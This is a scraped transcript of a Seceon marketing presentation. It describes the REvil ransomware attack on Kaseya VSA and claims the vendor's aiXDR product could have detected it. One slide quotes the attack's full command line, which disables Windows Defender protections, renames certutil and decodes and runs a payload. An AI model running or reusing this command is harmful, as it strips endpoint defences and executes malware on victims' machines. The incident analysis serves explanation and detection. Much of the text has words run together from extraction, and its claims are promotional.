1 / 7

How Seceon could have stopped the Ransomware roll over Kaseya

Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and thatu2019s created a lot of chaos. Call Us: 1 (978)-923-0040

Companyseceon
Download Presentation

How Seceon could have stopped the Ransomware roll over Kaseya

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. How Seceon could have stopped theRansomwarerolloverKaseya. The attack and ways will keep on changing, one of the most Recent attack that Kaseya faced is the result of what & where industry is missingin termsofCybersecurity. The attack on Kaseya came in action afew days ago. The sudden attack emerged in abrutal way infecting around 1500 businesses worldwide asperthe statement byKaseya’sCEO.Thenamesof infectedcompaniesarenotyetout.Theobservedresult of this attackswas seenwith Swedish Coopsupermarket which was forced toclose.TheyareamongoneoftheclientsoftheseMSPswhich were hacked and got infectedwith2100endpoints.

  2. A$70millionsransomwasdemandedfordata backup. The REvil Ransomware gang is being considered responsible for this operation.It’sstill amysterywhetherREvil preparedthisattack themselves oritwasfromanyoftheirassociates. Kaseyahasbeencompletelyforcedtoshutdowntheircloud infrastructureto stopmalicious updatesfromspreadingandthey completely advised their customer to power down their servers and that’screatedalotofchaos. What is VSA, How it got compromised and Ransomware rolledoverit.. VSA is a remote monitoring tool, a kind of remote access tool or RAT that allows to havethe completeaccessof systemordeviceit’s installed on, which helps IT Technicians to diagnose and fix problems remotely. Every organization doesn’t have resources to manage their infrastructureinhouse,sotheyoutsourcethisasataskto MSP (Managed Service Provider). These MSPs often manage the system of hundredsofcompanies simultaneously. Kaseya is an MSP provider with VSA as a product it has its own prem version, which is run by the customer in their environment, this is typically needed by MSPs to manage all their client system and this was something that was off with Kaseyaserver that was used to manage lot of their clients. Having the access of this server will itself allow it to have the access of all clients associated with it. And this howitwascompromisedatinitial. Soon after the attack rolled out all the VSA Server were advised to close. The operation was huge enough to infect the business, it was the mass ransomware unlike the ransomware that we know usually whereorganizations get infected with Ransomware and all system they get encrypt and are ask for ransom, here case was quite different where100’s oforganizationaroundtheworldgotencrypted simultaneouslywiththesameransomwarecampaignwhichwas tunnelledduring thesoftwareupdateinKaseya,sincefromthe inceptionit moved in asupplychainattack. It was a kind of compromise ofKaseyawhichwasoperatedonVSA

  3. server rather than any of their directory directly that we usually see in Ransomware. TheVSAserverwasusedtoransomwarealot of organizations in single click and this is what has happened at high levelin it. Howdoesitpropagate? ThescenarioislikeIfthereisadeviceusing Kaseya’sagent to monitor all the device subjected to policy and that is connected to centralserverandthatserverisaffectedthen theentiresystem connected with it is at higher risk, and this is how it propagated in the formofchainattack oneaftertheotherand affected1000sofserver. Howdidtheinitialcompromisebegin andaiXDR detection? As VSA server vulnerability was exploited, Seceon aiXDR can detect and remediate exploited vulnerabilities and zero day attack in very earlystages.Hereisthesteps by steps analysis: aiXDR monitors all inbound and outbound connections and in this case aiXDR should have detected a connection from Blacklisted IPs or fromaprohibitedcountryandautomaticallyblocked thatconnection. Onceconnectionwasmadeitwastryingtodownload/upload agent.exe on the host , aiXDR can detect data exfiltration and in this caseaiXDRshouldhaveblockedthatconnectionsoitcannot downloadtheagent.exeortransfersthe datatoexternalhosts. Also when the host had agent.exe downloaded, it was doing a different type of scan to get access to another host – aiXDR should have detected those scans and automatically quarantined that host so itcannotinfectotherhosts. Following PowerShell command was launched by the C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exefileoftheKaseyaVSA platform. “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference

  4. -DisableRealtimeMonitoring$true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true-DisableScriptScanning$true -EnableControlledFolderAccessDisabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exeC:\Windows\cert.exe&echo %RANDOM%>>C:\Windows\cert.exe&C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crtC:\Windows\cert.exe&c:\kworking\agent.exe As the AgentMon.exe starts its 1st process to execute the powershell command the aiXDR would have detected a new process startedasAgentMon.exefromC:\ProgramFiles(x86)\Kaseya\ aiXDRdetects ifanyprotectionserviceis disabled onthehostas we can see in this case they were trying to disable protection services aiXDRdetects ifanyprocessisrenamedasMasqueradingaswe cansee in thiscasecertutil.exewasrenamedascert.exe. Whatwastheimpactofthis? The threat actor was able to manage execution of code that enabled them to searchscripts that linked with Kaseya’sapplication to pull outcertainproceduresor agentupdates.Itwaspartofthe functionality of the application to push out procedures through all managedagents.Theseagentsrunonthecomputerwhich is managed by this solution. They simply run the script to all managed clients and that triggered afile copy and execution of script to all managedclients.Thisishowtheyendedbyinfectingallthese systems. There were a couple of steps that were initiated step by step to make a complete successful attempt for attack but surprisingly it was never lookedatanddetected in between.

  5. ApproachafterInfected? • There are always different indicators left on the system to know how it’s being compromised or not, here in this case it has been identified that logs have been cleared at multiple stages. The logs were gone and other types of logs inside the application database itself were deleted but still some logs were there to know what VSA server has put out to manage clients. These logs became a point to bring out the investigationofhowthesystemwastargetedfromtheVSA server. • FewindicationsofBeingRansomware. • Ransomware is coming out asacomplete business model and the threat actors aremaking alot of money out of it. Below arefew indicationsmentionedbelow: • All files in the system get encrypted and left with a README file sayingaboutransom amount.Itwill changethe file extension whichisaclearindication of attackoccurrence. • Some of the files they may or may not get encrypted this happen in the case where ransomware did not execute successfully i.e it gets executedpartially. • Provisional execution that disables antivirus functionality such as Windowsdefender orother security layers. BriefAboutSeceonaiXDR SeceonaiXDR ishighlyeffective,enrichedwithcapabilityof machinelearning,AI,Bigdata, Dynamicthreatintel, strong correlation and in-depth analysis which easily allows to cut & throwthethreatrootsatveryinitialstage. Thesolutiondetectsthethreatoriginwhetherit’scomingfrom Network,application,hostormachinelearning.Itcomesout with oneofthemostinterestingfeaturetoshowanything and everything that wasdonetomaketheattackattemptandhow Seceonsolutionstoppedthewayinbetweentomakethe

  6. ... environmentsecurewith 360 degreeComprehensivevisibility, Proactive Threat Detection, Auto stopping of Threat and breaches inReal time. The customer should always makesure that they arenot just taking a solution which is problem specific, the solution should always be capable of saving the environment from all kinds of threatandmaliciousactivitywhetheritisknownorunknown. The Seceon aiXDR is a single all-in-one platform. That helps to eliminatetheuseofsilosbasedsolutionsand deliversthe effective essential result inComprehensivemanner. Diag.showtheSeceonaiXDRapproach “Continuous real-time Monitoring, proactiveDetection &auto Stopthreatsandbreaches” Best CybersecurityROI.

  7. Contact Us Address -238 Littleton Road, Suite #206,Westford, MA 01886, USA Phone Number - +1 (978)-923-0040 Email Id - sales@seceon.com , info@seceon.com Website - https://www.seceon.com/ Twitter - https://twitter.com/Seceon_Inc

More Related